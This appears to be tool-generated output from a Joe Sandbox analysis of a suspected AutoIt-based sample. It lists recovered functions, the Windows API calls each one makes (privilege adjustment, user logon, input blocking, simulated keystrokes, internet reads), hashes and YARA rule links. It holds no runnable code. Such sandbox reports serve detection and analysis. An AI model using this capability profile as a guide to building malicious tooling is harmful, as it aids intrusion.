Opcode ID: 59797f2980cba23db0ab325c4d449a88f543ee74c4ef5ddb2aead766a3e3b7e5
Instruction ID: d8a4fbbd49749873b28b83e60f3c600c91a144fd0880d3cca4169d5be3ba7c64
Opcode Fuzzy Hash: 59797f2980cba23db0ab325c4d449a88f543ee74c4ef5ddb2aead766a3e3b7e5
Instruction Fuzzy Hash: A63182711083419FD305EF50E885FEFBBE8AF9A750F40052DF585821A2EB719989CB92

Function 001229BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00121ED6,00000000), ref: 00122AAD
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00122AE4

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 842a5f898ef4b21720baf947770425329f2b216bdf24535ce2b3f3c783ab9d2e
Instruction ID: 27f9751dbf5b70ad87a291b6238fac39b883b907a903f7f452f9ef52971ec624
Opcode Fuzzy Hash: 842a5f898ef4b21720baf947770425329f2b216bdf24535ce2b3f3c783ab9d2e
Instruction Fuzzy Hash: 8941E571600319BFEB20DE95EC85EBFB7ACEB40754F10401AF605A7A41DB709E919B60

Function 00109399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 000D0FE6: std::exception::exception.LIBCMT ref: 000D101C
Part of subcall function 000D0FE6: __CxxThrowException@8.LIBCMT ref: 000D1031

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001093E3
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00109410
GetLastError.KERNEL32 ref: 0010941D

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: ad2fffba34ad70fa8efa8b35e67efae825230c4e57faa4ad19022b8ef6e4febb
Instruction ID: 27e8fc2110d2542f6d11f1c57a190b79c533e06af99097d1cf5b2abd93b786af
Opcode Fuzzy Hash: ad2fffba34ad70fa8efa8b35e67efae825230c4e57faa4ad19022b8ef6e4febb
Instruction Fuzzy Hash: 3A1191B1414305AFD728EF64EC85D6BB7BCFB48750B20852EF49997691EB70AC41CB60

Function 00114254 Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00114271
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 001142B2
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001142BD

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 080f7c2b7f86af4480d43bebe18fec28589dfba6424383d96ddafbc0d725ba20
Instruction ID: 2bd9f47075b6b2a1703691c29f8d0271c17295a4085ffe3e3d10049c2cea2aae
Opcode Fuzzy Hash: 080f7c2b7f86af4480d43bebe18fec28589dfba6424383d96ddafbc0d725ba20
Instruction Fuzzy Hash: 3E113075E01228BFDB148F95AC44BAFBBBCEB49B60F104165FD04E7290C6715A418BA1

Function 00114F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00114F45
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00114F5C
FreeSid.ADVAPI32(?), ref: 00114F6C

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: c0d8501d2cfb2c538c37c5dcd8ecf234527ad697634241e2859c1a4c790bb2a0
Instruction ID: 652d8c5db39a5baac3a2885456c5236cae124e30b2cdfef1bd8dbe3402d5e527
Opcode Fuzzy Hash: c0d8501d2cfb2c538c37c5dcd8ecf234527ad697634241e2859c1a4c790bb2a0
Instruction Fuzzy Hash: 9EF04F7591130DBFDF04DFE4DC89AADB7BCEF08201F104469AA01E3590D7355A448B50

Function 000BE36D Relevance: 4.5, APIs: 3, Instructions: 29sleeptimeCOMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32 ref: 000BE37C
timeGetTime.WINMM ref: 000BE385
Sleep.KERNEL32(00000000), ref: 000BE3BE

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: FrequencyPerformanceQuerySleepTimetime
String ID:
API String ID: 2771490736-0
Opcode ID: 6897aaa31850a63c3e65a8c2d9325bf653ea2da3a9b90cc21ff0b8297333dfd0
Instruction ID: cb191d5a734f8adae77c04d612eb1df8647b17c7d2d00f71cecdf9edc444e395
Opcode Fuzzy Hash: 6897aaa31850a63c3e65a8c2d9325bf653ea2da3a9b90cc21ff0b8297333dfd0
Instruction Fuzzy Hash: 8BF05E302406019FC3A0EB69D849BE6B7E4AB49751F000029E92AC7361DB70AC40CB91

Function 00111AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00111B01
keybd_event.USER32(?,000BECBC,?,00000000), ref: 00111B14

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 75db548ba4944b482e9de292478a0fbc7528153ba1e3889bf3500fc243c16c0b
Instruction ID: fce50987df16e23ed9e17b925ca5d00560089f5629982e445fed62160f8c06ff
Opcode Fuzzy Hash: 75db548ba4944b482e9de292478a0fbc7528153ba1e3889bf3500fc243c16c0b
Instruction Fuzzy Hash: 84F0A93190020CABDB04CF91C805BFEBBB4FF08312F00800AFE459A2A2D3398A51DF94

Function 0011A6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00129B52,?,0014098C,?), ref: 0011A6DA
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00129B52,?,0014098C,?), ref: 0011A6EC

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: c5e1a7da4b4b407f34422463557a54b1e92ceeb4988b2c2465136a0d744500a6
Instruction ID: e9264b890ecbd27ccfdde903992f8af8b75b5a1f7329d214dcd1ed2945f03582
Opcode Fuzzy Hash: c5e1a7da4b4b407f34422463557a54b1e92ceeb4988b2c2465136a0d744500a6
Instruction Fuzzy Hash: 8DF02E3540522DBFDB219FA4CC48FDA376CFF09361F004255B508D2191D7309980CBE1

Function 00108DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00108F27), ref: 00108DFE
CloseHandle.KERNEL32(?,?,00108F27), ref: 00108E10

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: c3f8c8d70bc176de07dd86c9cfc853e7424c99b1e552c41b8a73969af69baf30
Instruction ID: bb46c565a730e6c198d24cd6ba15b03ceed21de179621a2d6dada3350785b42c
Opcode Fuzzy Hash: c3f8c8d70bc176de07dd86c9cfc853e7424c99b1e552c41b8a73969af69baf30
Instruction Fuzzy Hash: 16E0BF75014610EFE7262B51FC09DB77BADEB043507148919F59580471DB725CD0DB60

Function 000DA385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,000D8F87,?,?,?,00000001), ref: 000DA38A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 000DA393

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c515758cb93d9eedd5755925829b3813e5a1fc217f5e01966a1d6867f6983971
Instruction ID: 1a9f8b6e529cbec0bc1f1e29ce6277dd897c9056c07bafe5db852f0101f0dcbc
Opcode Fuzzy Hash: c515758cb93d9eedd5755925829b3813e5a1fc217f5e01966a1d6867f6983971
Instruction Fuzzy Hash: 67B09235064208AFCA422F92EC09B883F68FB4AA62F004010FB0D44870CB7254908A91

Function 000BEF4F Relevance: 1.6, APIs: 1, Instructions: 52clipboardCOMMON

Download Yara Rule

APIs

EmptyClipboard.USER32 ref: 000BEFB8

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ClipboardEmpty
String ID:
API String ID: 4274823084-0
Opcode ID: f75c628f8e649160e335bdf28bf3d3b184d6c77cd2045d248d88368745165ff7
Instruction ID: 5aa14844c06f86ceaa733367a5032fc60db104d9539a052d90b2e2135422e2b9
Opcode Fuzzy Hash: f75c628f8e649160e335bdf28bf3d3b184d6c77cd2045d248d88368745165ff7
Instruction Fuzzy Hash: 60016936600A5A9F8B10EF68C881CEEB7A9EF853107158468F95697353DA30FD01CB90

Function 001245D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 001245F0

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 2b472f4691bbb847b3277c4bd579963e5e04497d50ef5ca8d8672a20074e0594
Instruction ID: 24d9deb28e495ca0a2d3e6c56f13eb5f1175253872a0913b124607e941ea06c5
Opcode Fuzzy Hash: 2b472f4691bbb847b3277c4bd579963e5e04497d50ef5ca8d8672a20074e0594
Instruction Fuzzy Hash: EAE0DF352102159FC310AF5AE804ACAF7E8EF98760F01841AFD49C7312DB70E9418B90

Function 00109369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00108FA7), ref: 00109389

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: b441a0d2e3e74f87a4d3a7d920a3933e565a05fa3957e328ecba8a4e8859851e
Instruction ID: 1ab8a5543e54e0a4edc05206301a15d7b71b22fe0b857aab5fc911768fc58fcf
Opcode Fuzzy Hash: b441a0d2e3e74f87a4d3a7d920a3933e565a05fa3957e328ecba8a4e8859851e
Instruction Fuzzy Hash: 0BD05E3226050EABEF018EA4DC01EAE3B69EB04B01F408111FE15C60A0C776D835AB60

Function 000F0722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 000F0734

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: c0efc67c7092993b132471849f48921aea39b4c0f2e3060bee142be881c9443e
Instruction ID: 544fca64bad5bbc7d32e30c07f9fe01ca3ab434dabd3be0201436f7565565424
Opcode Fuzzy Hash: c0efc67c7092993b132471849f48921aea39b4c0f2e3060bee142be881c9443e
Instruction Fuzzy Hash: 3DC04CF581010DDBCB15DBA0D988EFE77BCAB08344F100055A205B3511D7749B449A71

Function 000DA354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 000DA35A

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1dffcd13fbb2dfb0339eef5184101187a3178179d46318c034fe288f10be76fb
Instruction ID: 5d40a45b9aeff11cc79ca61d28d22caac5f3c4fcfc994ebb80f98adaf5c321ef
Opcode Fuzzy Hash: 1dffcd13fbb2dfb0339eef5184101187a3178179d46318c034fe288f10be76fb
Instruction Fuzzy Hash: 49A0123002010CAB8A011F42EC044447F5CE7055507004010F50C00431873254504580

Function 000BEC83 Relevance: .5, Instructions: 460COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 7ca2f66526dff3a05d6f709b463391f04d2deccf95bed1311080324bea60b5a6
Instruction ID: ddd92b64ffe610a06c83f69d8eac0fae767931550a9b58ccbe456f3f2b4b345b
Opcode Fuzzy Hash: 7ca2f66526dff3a05d6f709b463391f04d2deccf95bed1311080324bea60b5a6
Instruction Fuzzy Hash: 36F125715087419FC714DF28C8919AFBBE9EF89714F44492DF98687262EB30EE05CB92

Function 000F66DF Relevance: .2, Instructions: 165COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 000F6872

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 00ba47fc6949cc806c5baac8dcbd6b58b28cac65107bbff79cb98bcb9748b451
Instruction ID: b7b8d1eca6f8f961d65a24f9e819cb11fbb394ec49ab6d05286c799ab41d8b17
Opcode Fuzzy Hash: 00ba47fc6949cc806c5baac8dcbd6b58b28cac65107bbff79cb98bcb9748b451
Instruction Fuzzy Hash: ED615770E0021ADBCF74DE58C990BBDB7B1BB54318F1481AADA04A7680DB719D84DB90

Function 000F66CF Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46aaa04024084d1d55329c3c72ad3da4dbbcce85ccff0327d33cae60860f4b8a
Instruction ID: 5c88470c331f7b48dcfaa2581c42d5f7f91d350da423e5ffbeef323317ef45e0
Opcode Fuzzy Hash: 46aaa04024084d1d55329c3c72ad3da4dbbcce85ccff0327d33cae60860f4b8a
Instruction Fuzzy Hash: 9B513670E0021ADBCF75DE58C991BBDB7F1BF54318F1481AAEA08A7640DB719D84DB90

Function 00127EF0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filememorywindowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 00127F45
DeleteObject.GDI32(?), ref: 00127F57
DestroyWindow.USER32 ref: 00127F65
GetDesktopWindow.USER32 ref: 00127F7F
GetWindowRect.USER32(00000000), ref: 00127F86
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 001280C7
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 001280D7
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0012811F
GetClientRect.USER32(00000000,?), ref: 0012812B
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00128165
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00128187
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0012819A
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001281A5
GlobalLock.KERNEL32(00000000), ref: 001281AE
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001281BD
GlobalUnlock.KERNEL32(00000000), ref: 001281C6
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001281CD
GlobalFree.KERNEL32(00000000), ref: 001281D8
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001281EA
#418.OLEAUT32(88C00000,00000000,00000000,00143C7C,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00128200
GlobalFree.KERNEL32(00000000), ref: 00128210
